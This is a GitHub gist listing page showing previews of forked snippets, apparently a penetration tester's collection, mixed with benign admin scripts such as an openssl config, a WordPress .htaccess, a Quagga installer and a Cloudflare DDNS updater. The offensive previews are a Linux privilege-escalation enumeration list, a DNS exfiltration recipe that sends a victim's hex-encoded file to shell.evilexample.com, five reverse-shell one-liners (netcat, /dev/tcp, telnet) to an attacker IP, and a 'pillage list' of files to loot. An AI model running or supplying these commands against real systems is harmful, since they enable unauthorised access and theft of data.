'(◣_◢)' Cynesiz
Cynesiz
/ linux_privesc
Created
May 30, 2016 21:40
— forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Determine linux distribution and version | |
| cat /etc/issue | |
| cat /etc/*-release | |
| cat /etc/lsb-release | |
| cat /etc/redhat-release | |
| // Determine kernel version - 32 or 64-bit? | |
| cat /proc/version | |
| uname -a | |
| uname -mrs |
Cynesiz
/ dns_egress_nix
Created
May 30, 2016 21:47
— forked from sckalath/dns_egress_nix
DNS transfer on Linux
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| On victim: | |
| 1. Hex encode the file to be transferred: | |
| xxd -p secret file.hex | |
| 2. Read in each line and do a DNS lookup: | |
| for b in 'cat file.hex'; do dig $b.shell.evilexample.com;done | |
| On attacker: | |
| 1. Capture DNS exfil packets | |
| tcpdump -w /tmp/dns -s0 port 53 and host system.example.com | |
| 2. Cut the exfilled hex from the DNS packet |
Cynesiz
/ netcat_reverse_shell_backpipe
Created
May 30, 2016 21:47
— forked from sckalath/netcat_reverse_shell_backpipe
Netcat without netcat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #1 | |
| nc <attacker_ip> <port> -e /bin/bash | |
| #2 | |
| mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe | |
| #3 | |
| /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1 | |
| #4 | |
| mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe | |
| #5 | |
| telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port> |
Cynesiz
/ linux_pillage
Created
May 30, 2016 21:47
— forked from sckalath/linux_pillage
Linux Pillage List
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /apache/logs/access.log | |
| /apache/logs/error.log | |
| /bin/php.ini | |
| /etc/alias | |
| /etc/apache2/apache.conf | |
| /etc/apache2/conf/httpd.conf | |
| /etc/apache2/httpd.conf | |
| /etc/apache/conf/httpd.conf | |
| /etc/bash.bashrc | |
| /etc/chttp.conf |
Cynesiz
/ linux_pillage
Created
May 30, 2016 21:47
— forked from sckalath/linux_pillage
Linux Pillage List
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /apache/logs/access.log | |
| /apache/logs/error.log | |
| /bin/php.ini | |
| /etc/alias | |
| /etc/apache2/apache.conf | |
| /etc/apache2/conf/httpd.conf | |
| /etc/apache2/httpd.conf | |
| /etc/apache/conf/httpd.conf | |
| /etc/bash.bashrc | |
| /etc/chttp.conf |
Cynesiz
/ openssl.cnf
Created
June 21, 2016 11:12
— forked from leonklingele/openssl.cnf
Useful openssl commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ req ] | |
| default_bits = 4096 | |
| default_md = sha256 | |
| default_keyfile = private.key | |
| distinguished_name = req_distinguished_name | |
| attributes = req_attributes | |
| x509_extensions = v3_user_req | |
| req_extensions = v3_user_req | |
| [ req_distinguished_name ] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # BEGIN WordPress | |
| <IfModule mod_rewrite.c> | |
| RewriteEngine On | |
| RewriteBase / | |
| RewriteRule ^index\.php$ - [L] | |
| RewriteCond %{REQUEST_FILENAME} !-f | |
| RewriteCond %{REQUEST_FILENAME} !-d | |
| RewriteRule . /index.php [L] | |
| </IfModule> |
Cynesiz
/ installQuaga.sh
Created
July 13, 2016 23:43
— forked from ben-bradley/installQuaga.sh
Quagga install & setup on Ubuntu (https://wiki.ubuntu.com/JonathanFerguson/Quagga)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ### Copy/paste from https://wiki.ubuntu.com/JonathanFerguson/Quagga | |
| ## Use | |
| ## === | |
| ## $ sudo ./installQuagga.sh | |
| ## Install the Quagga routing daemon | |
| ## ================================= | |
| apt-get -y install quagga |
Cynesiz
/ bash.generate.random.alphanumeric.string.sh
Created
July 14, 2016 04:33
— forked from earthgecko/bash.generate.random.alphanumeric.string.sh
shell/bash generate random alphanumeric string
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # bash generate random alphanumeric string | |
| # | |
| # bash generate random 32 character alphanumeric string (upper and lowercase) and | |
| NEW_UUID=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1) | |
| # bash generate random 32 character alphanumeric string (lowercase only) | |
| cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1 |
Cynesiz
/ ddns.sh
Created
August 1, 2016 07:23
— forked from lyoshenka/ddns.sh
Quick and dirty DDNS using Bash and Cloudflare (API v4 compatible)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # Step 1: Fill in EMAIL, TOKEN, DOMAIN and SUBDOMAIN. Your API token is here: https://www.cloudflare.com/a/account/my-account | |
| # Make sure the token is the Global token, or has these permissions: #zone:read, #dns_record:read, #dns_records:edit | |
| # Step 2: Create an A record on Cloudflare with the subdomain you chose | |
| # Step 3: Run "./ddns.sh -l" to get the zone_id and rec_id of the record you created. | |
| # Fill in ZONE_ID and REC_ID below | |
| # This step is optional, but will save you 2 requests every time you this script | |
| # Step 4: Run "./ddns.sh". It should tell you that record was updated or that it didn't need updating. | |
| # Step 5: Run it every hour with cron. Use the '-s' flag to silence normal output |
OlderNewer